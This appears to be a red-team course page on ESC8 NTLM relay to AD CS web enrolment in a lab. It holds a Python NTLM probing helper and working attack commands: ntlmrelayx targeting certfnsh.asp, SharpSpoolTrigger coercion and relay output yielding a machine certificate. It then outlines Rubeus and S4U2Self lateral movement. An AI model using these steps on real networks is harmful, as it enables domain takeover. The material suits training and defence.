# NTLM Relaying to ADCS HTTP Endpoints

AD CS supports HTTP-based enrolment (the Certification Authority Web Enrollment role service) and even includes a web GUI. This endpoint is usually found at `http[s]://<hostname>/certsrv`.


![](https://files.cdn.thinkific.com/file_uploads/584845/images/35f/294/c07/certsrv.png)


If the endpoint accepts NTLM authentication (and does not enforce Extended Protection for Authentication or require HTTPS with channel binding), it is vulnerable to NTLM relay, the scenario commonly referred to as ESC8. A common abuse method is to coerce a domain controller to authenticate to an attacker-controlled listener, relay that authentication to the CA's web enrolment endpoint to obtain a certificate for the DC's machine account, and then use the certificate to obtain a TGT via PKINIT.

An important aspect to be aware of is that NTLM authentication cannot be relayed back to the machine it originated from (NTLM reflection has been blocked since MS08-068). We therefore could not relay a DC to a CA if both services were running on the same machine. This is indeed the case in the RTO lab, as each CA is installed on a DC.
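As an added example (not part of the original page and not ntlmrelayx code), the following Python performs the two checks the last two paragraphs imply before anything is coerced: does the `/certsrv` endpoint offer NTLM at all, and which host is actually answering, so that the relay is not going back to the machine being coerced. It builds the Type 1 NEGOTIATE probe you would send as `Authorization: NTLM <base64>`, parses the Type 2 CHALLENGE returned in `WWW-Authenticate: NTLM <base64>` (the AV_PAIR target info carries the responder's NetBIOS and DNS names), and flags the reflection case. The host names (`DEV`, `CA-DC`, `ca-dc.dev.corp.local`, `dev.corp.local`) and the challenge bytes are constructed here; nothing is captured from a real CA.

```python
import base64
import struct
from typing import List, Optional

# Negotiate flags from MS-NLMP 2.2.2.5 (only those this example sets or checks)
NEGOTIATE_UNICODE = 0x00000001
REQUEST_TARGET = 0x00000004
NEGOTIATE_NTLM = 0x00000200
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_VERSION = 0x02000000
# AV_PAIR ids (MS-NLMP 2.2.2.1) that identify the host answering the challenge
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
          4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp"}


def build_negotiate() -> bytes:
    """Type 1 NEGOTIATE_MESSAGE (empty domain/workstation); base64 it into 'Authorization: NTLM'."""
    flags = NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM
    # MessageType 1, flags, then two empty field descriptors whose offset points past the header
    return b"NTLMSSP\x00" + struct.pack("<IIHHIHHI", 1, flags, 0, 0, 32, 0, 0, 32)


def ntlm_offered(www_authenticate: List[str]) -> bool:
    """True if any WWW-Authenticate value on the 401 advertises the NTLM scheme."""
    return any(v.split(None, 1)[0].upper() == "NTLM" for v in www_authenticate if v.strip())


def challenge_from_headers(www_authenticate: List[str]) -> Optional[bytes]:
    """Pull the Type 2 blob out of 'WWW-Authenticate: NTLM <base64>'."""
    for v in www_authenticate:
        parts = v.split(None, 1)
        if len(parts) == 2 and parts[0].upper() == "NTLM":
            return base64.b64decode(parts[1])
    return None


def parse_challenge(blob: bytes) -> dict:
    """Decode the CHALLENGE_MESSAGE fixed header and its AV_PAIR target info."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)  # TargetNameFields
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)  # TargetInfoFields
    target_info, pos, end = {}, ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        value, pos = blob[pos + 4:pos + 4 + av_len], pos + 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        name = AV_IDS.get(av_id)
        if name == "Timestamp":
            target_info[name] = struct.unpack("<Q", value)[0]  # FILETIME
        elif name:
            target_info[name] = value.decode("utf-16-le")
    return {"flags": flags, "server_challenge": blob[24:32].hex(),
            "target_name": blob[tn_off:tn_off + tn_len].decode("utf-16-le"),
            "target_info": target_info}


def relay_is_reflection(coerced_host: str, parsed: dict) -> bool:
    """True when the host we intend to coerce is the host that answered: the relay would reflect and fail."""
    ti = parsed["target_info"]
    nb, dns = ti.get("NbComputerName", "").upper(), ti.get("DnsComputerName", "").upper()
    host = coerced_host.upper().rstrip("$")
    return bool(nb or dns) and (host == dns or host.split(".")[0] == nb)


def build_constructed_challenge(nb_domain: str, nb_host: str, dns_host: str, dns_domain: str) -> bytes:
    """CONSTRUCTED Type 2 message standing in for a /certsrv reply; not a capture from a real CA."""
    def av(av_id: int, text: str) -> bytes:
        v = text.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(v)) + v
    target_info = (av(2, nb_domain) + av(1, nb_host) + av(4, dns_domain) + av(3, dns_host)
                   + av(5, dns_domain) + struct.pack("<HHQ", 7, 8, 133000000000000000)
                   + struct.pack("<HH", 0, 0))  # MsvAvEOL
    target_name = nb_domain.encode("utf-16-le")
    flags = (NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM
             | NEGOTIATE_TARGET_INFO | NEGOTIATE_VERSION)
    tn_off = 56  # fixed header including the 8-byte Version field
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(target_name), len(target_name), tn_off)
    msg += struct.pack("<I", flags)
    msg += bytes.fromhex("0123456789abcdef") + b"\x00" * 8  # constructed ServerChallenge + Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info), tn_off + len(target_name))
    msg += struct.pack("<BBH3xB", 10, 0, 17763, 15)  # Version 10.0.17763, NTLMSSP revision 15
    return msg + target_name + target_info


def probe_summary(www_authenticate: List[str], coerced_host: str) -> dict:
    """Is NTLM offered, which host answered, and would relaying from coerced_host reflect?"""
    out = {"ntlm_offered": ntlm_offered(www_authenticate), "ca_host": None, "reflection": None}
    blob = challenge_from_headers(www_authenticate)
    if blob is not None:
        parsed = parse_challenge(blob)
        out["ca_host"] = parsed["target_info"].get("DnsComputerName")
        out["reflection"] = relay_is_reflection(coerced_host, parsed)
    return out


def demo() -> dict:
    # Constructed 401 headers: the bare scheme list plus the Type 2 reply to our probe.
    blob = build_constructed_challenge("DEV", "CA-DC", "ca-dc.dev.corp.local", "dev.corp.local")
    headers = ["Negotiate", "NTLM " + base64.b64encode(blob).decode()]
    return {"from_web": probe_summary(headers, "WEB"),     # WEB -> CA: relayable
            "from_ca": probe_summary(headers, "CA-DC")}    # CA -> itself: reflection
```

Against a live endpoint, send `build_negotiate()` base64-encoded in an `Authorization: NTLM` header to `/certsrv/`, collect every `WWW-Authenticate` value from the 401, and hand them to `probe_summary()` together with the host you plan to coerce. The challenge says nothing about whether EPA is enforced on the endpoint; that only shows up later, as the relayed authentication failing.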

Another good way to abuse this primitive is to target a machine configured for unconstrained delegation: a certificate for its machine account gives us a TGT as that machine, and with it access to the host.

We already have access to WEB as jking, but this is another way of achieving the same end.


To achieve this, we need:

* PortBender on Workstation 2 to capture traffic hitting port 445 (which the Windows SMB service already owns) and redirect it to port 8445.
* A reverse port forward so that traffic hitting port 8445 on Workstation 2 reaches the team server on port 445, where ntlmrelayx's SMB server listens.
* A SOCKS proxy so that ntlmrelayx can send the relayed traffic back into the network (hence the `proxychains` prefix on the command).


The ntlmrelayx command needs to target the `certfnsh.asp` page on the AD CS web enrolment server. `--adcs` makes it request a certificate with the relayed identity, and `--no-http-server` disables its HTTP listener since only SMB is being captured here.

```
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
```


Then force WEB to authenticate to WKSTN-2. SharpSpoolTrigger takes the target (WEB, 10.10.122.30) as its first argument and the listener (WKSTN-2, 10.10.123.102) as its second.

```
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102
```

```
[*] Servers started, waiting for connections
[*] SMBD-Thread-4: Received connection from 127.0.0.1, attacking target https://10.10.122.10
|S-chain|-<>-127.0.0.1:1080-<><>-10.10.122.10:443-<><>-OK
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against https://10.10.122.10 as DEV/WEB$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Base64 certificate of user WEB$:MIIRRQ[...]qDRJLE
```


The base64 blob is a PFX for the WEB$ machine account. With it, request a TGT for WEB$ (e.g. Rubeus `asktgt /user:WEB$ /certificate:<base64>`), then use the S4U2Self trick to obtain usable TGSs for a privileged user to WEB itself and move laterally onto it.

